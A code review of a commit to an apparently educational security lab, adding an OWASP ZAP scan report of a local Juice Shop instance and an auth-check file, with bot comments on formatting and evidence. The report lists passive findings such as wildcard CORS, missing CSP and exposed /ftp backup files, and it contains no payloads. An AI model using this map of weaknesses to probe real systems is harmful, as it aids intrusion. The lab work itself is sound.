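Review bot: the whole application configuration is committed as a single unformatted line (`@@ -0,0 +1 @@`, no trailing newline), so any future change will show up as a rewrite of the entire file and cannot be reviewed; run it through `jq .` or `python -m json.tool` before committing. There is also nothing in the commit or the lab folder saying what this file is or why it sits next to the ZAP artifacts; a short note in the lab README naming the step that produced it, and stating that it is a scan capture rather than configuration the lab loads, is needed. The content is the public Juice Shop default configuration (including `googleOauth.clientId` and the `authorizedRedirects` list), so nothing in it is secret, but the observation worth recording in the lab write-up is that the running application serves its complete configuration, challenge settings and `csafHashValue` included, not the blob itself.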
diff --git a/labs/lab5/zap/auth-check.txt b/labs/lab5/zap/auth-check.txt
new file mode 100644
index 00000000..a50adc1f
--- /dev/null
+++ b/labs/lab5/zap/auth-check.txt
@@ -0,0 +1,2 @@
+token_length=732
+zap_exit=2
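Review bot: `token_length=732` only proves that some token string was obtained; it says nothing about whether ZAP actually sent it or whether the authenticated scan reached routes that reject anonymous requests. Record something a reader can verify, for example the HTTP status of one request made with the token against a route that returns 401 without it, and the number of URLs ZAP visited in the authenticated context. Add a comment line stating what `zap_exit=2` means: if this is the exit status of one of the ZAP packaged scans (zap-baseline.py or zap-full-scan.py), 2 signals at least one WARN-level alert and no FAIL, while 0, 1 and 3 mean clean, FAIL and scan error respectively, so the value must not be read as a failed run. Keeping only the length and not the token itself is the right call; say so in the file so nobody "fixes" it by adding the token.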
diff --git a/labs/lab5/zap/report-auth.html b/labs/lab5/zap/report-auth.html
new file mode 100644
index 00000000..8ab01433
--- /dev/null
+++ b/labs/lab5/zap/report-auth.html
@@ -0,0 +1,4092 @@
+
+
+
+
+
+
+
+
+
+
+
+ ZAP Scanning Report
+
+
+ Site: http://localhost:3000
+
+
+
+
+ Generated on Fri, 8 May 2026 08:45:34
+
+
+
+ ZAP Version: 2.16.1
+
+
+
+ ZAP by Checkmarx
+
+
+
+ Summary of Alerts
+
+
+
+
+
+
+
+
+
+ Risk Level
+ Number of Alerts
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Summary of Sequences
+ Alerts
+
+
+
+
+
+
+
+
+ Name
+ Risk Level
+ Number of Instances
+
+
+ Content Security Policy (CSP) Header Not Set
+ Medium
+
+
+ 11
+
+
+
+ Cross-Domain Misconfiguration
+ Medium
+
+
+ 10
+
+
+
+ Cross-Domain JavaScript Source File Inclusion
+ Low
+
+
+ 10
+
+
+
+ Dangerous JS Functions
+ Low
+
+
+ 2
+
+
+
+ Deprecated Feature Policy Header Set
+ Low
+
+
+ 11
+
+
+
+ Insufficient Site Isolation Against Spectre Vulnerability
+ Low
+
+
+ 10
+
+
+
+ Timestamp Disclosure - Unix
+ Low
+
+
+ 16
+
+
+
+ Information Disclosure - Suspicious Comments
+ Informational
+
+
+ 2
+
+
+
+ Modern Web Application
+ Informational
+
+
+ 11
+
+
+
+ Non-Storable Content
+ Informational
+
+
+ 4
+
+
+
+ Storable but Non-Cacheable Content
+ Informational
+
+
+ 7
+
+ Alert Detail
+
+
+
+
+
+
+
+
+
+ Content Security Policy (CSP) Header Not Set
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/coupons_2013.md.bak
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/encrypt.pyc
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/package-lock.json.bak
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/suspicious_errors.yml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/serve-index/index.js:145:39
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+ Instances
+
+
+ 11
+
+
+
+ Solution
+
+
+
+
+ Reference
+
+ https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP
+
+
+
+ https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html
+
+
+ https://www.w3.org/TR/CSP/
+
+
+ https://w3c.github.io/webappsec-csp/
+
+
+ https://web.dev/articles/csp
+
+
+ https://caniuse.com/#feat=contentsecuritypolicy
+
+
+ https://content-security-policy.com/
+
+
+
+ CWE Id
+ 693
+
+
+ WASC Id
+ 15
+
+
+ Plugin Id
+ 10038
+
+
+
+
+
+
+
+
+ Cross-Domain Misconfiguration
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+
+ URL
+ http://localhost:3000/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+
+ URL
+ http://localhost:3000/ftp
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+
+ URL
+ http://localhost:3000/main.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+
+ URL
+ http://localhost:3000/polyfills.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+
+ URL
+ http://localhost:3000/robots.txt
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+
+ URL
+ http://localhost:3000/vendor.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+ Instances
+
+
+ 10
+
+
+
+ Solution
+
+
+
+
+
+
+ Reference
+
+ https://vulncat.fortify.com/en/detail?category=HTML5&subcategory=Overly%20Permissive%20CORS%20Policy
+
+
+
+
+ CWE Id
+ 264
+
+
+ WASC Id
+ 14
+
+
+ Plugin Id
+ 10098
+
+
+
+
+
+
+
+
+ Cross-Domain JavaScript Source File Inclusion
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
+
+
+
+ Other Info
+
+
+
+ Instances
+
+
+ 10
+
+
+
+ Solution
+
+
+
+
+ Reference
+
+
+
+ CWE Id
+ 829
+
+
+ WASC Id
+ 15
+
+
+ Plugin Id
+ 10017
+
+
+
+
+
+
+
+
+ Dangerous JS Functions
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000/main.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ bypassSecurityTrustHtml(
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/vendor.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ bypassSecurityTrustHtml(
+
+
+
+ Other Info
+
+
+
+ Instances
+
+
+ 2
+
+
+
+ Solution
+
+
+
+
+ Reference
+
+ https://v17.angular.io/guide/security
+
+
+
+
+ CWE Id
+ 749
+
+
+ WASC Id
+
+
+
+ Plugin Id
+ 10110
+
+
+
+
+
+
+
+
+ Deprecated Feature Policy Header Set
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/coupons_2013.md.bak
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/encrypt.pyc
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/package-lock.json.bak
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/suspicious_errors.yml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/polyfills.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+ Instances
+
+
+ 11
+
+
+
+ Solution
+
+
+
+
+ Reference
+
+ https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Permissions-Policy
+
+
+
+ https://scotthelme.co.uk/goodbye-feature-policy-and-hello-permissions-policy/
+
+
+
+ CWE Id
+ 16
+
+
+ WASC Id
+ 15
+
+
+ Plugin Id
+ 10063
+
+
+
+
+
+
+
+
+ Insufficient Site Isolation Against Spectre Vulnerability
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+ Instances
+
+
+ 10
+
+
+
+ Solution
+
+
+
+
+
+
+ Reference
+
+ https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Cross-Origin-Embedder-Policy
+
+
+
+
+ CWE Id
+ 693
+
+
+ WASC Id
+ 14
+
+
+ Plugin Id
+ 90004
+
+
+
+
+
+
+
+
+ Timestamp Disclosure - Unix
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1650485437
+
+
+
+ Other Info
+ 1650485437, which evaluates to: 2022-04-20 20:10:37.
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1981395349
+
+
+
+ Other Info
+ 1981395349, which evaluates to: 2032-10-14 19:35:49.
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 2038834951
+
+
+
+ Other Info
+ 2038834951, which evaluates to: 2034-08-10 15:02:31.
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1650485437
+
+
+
+ Other Info
+ 1650485437, which evaluates to: 2022-04-20 20:10:37.
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1981395349
+
+
+
+ Other Info
+ 1981395349, which evaluates to: 2032-10-14 19:35:49.
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 2038834951
+
+
+
+ Other Info
+ 2038834951, which evaluates to: 2034-08-10 15:02:31.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1650485437
+
+
+
+ Other Info
+ 1650485437, which evaluates to: 2022-04-20 20:10:37.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1680327869
+
+
+
+ Other Info
+ 1680327869, which evaluates to: 2023-04-01 05:44:29.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1701244813
+
+
+
+ Other Info
+ 1701244813, which evaluates to: 2023-11-29 08:00:13.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1818181818
+
+
+
+ Other Info
+ 1818181818, which evaluates to: 2027-08-13 18:30:18.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1839622642
+
+
+
+ Other Info
+ 1839622642, which evaluates to: 2028-04-17 22:17:22.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1863874346
+
+
+
+ Other Info
+ 1863874346, which evaluates to: 2029-01-23 14:52:26.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1917098446
+
+
+
+ Other Info
+ 1917098446, which evaluates to: 2030-10-01 15:20:46.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1981395349
+
+
+
+ Other Info
+ 1981395349, which evaluates to: 2032-10-14 19:35:49.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 2033195021
+
+
+
+ Other Info
+ 2033195021, which evaluates to: 2034-06-06 08:23:41.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 2038834951
+
+
+
+ Other Info
+ 2038834951, which evaluates to: 2034-08-10 15:02:31.
+
+
+ Instances
+
+
+ 16
+
+
+
+ Solution
+
+
+
+
+ Reference
+
+ https://cwe.mitre.org/data/definitions/200.html
+
+
+
+
+ CWE Id
+ 497
+
+
+ WASC Id
+ 13
+
+
+ Plugin Id
+ 10096
+
+
+
+
+
+
+
+
+ Information Disclosure - Suspicious Comments
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000/main.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ query
+
+
+
+ Other Info
+ The following pattern was used: \bQUERY\b and was detected in likely comment: "//owasp.org' target='_blank'>Open Worldwide Application Security Project (OWASP)</a> and is developed and maintained by voluntee", see evidence field for the suspicious comment/snippet.
+
+
+
+ URL
+ http://localhost:3000/vendor.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Query
+
+
+
+ Other Info
+ The following pattern was used: \bQUERY\b and was detected in likely comment: "//www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M0 256C0 397.4 114.6 512 256 512s256-114.6 256-256S397.4 0 256 0S0 114.6 0", see evidence field for the suspicious comment/snippet.
+
+
+ Instances
+
+
+ 2
+
+
+
+ Solution
+
+
+
+
+ Reference
+
+
+
+ CWE Id
+ 615
+
+
+ WASC Id
+ 13
+
+
+ Plugin Id
+ 10027
+
+
+
+
+
+
+
+
+ Modern Web Application
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/fileServer.js:59:18
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
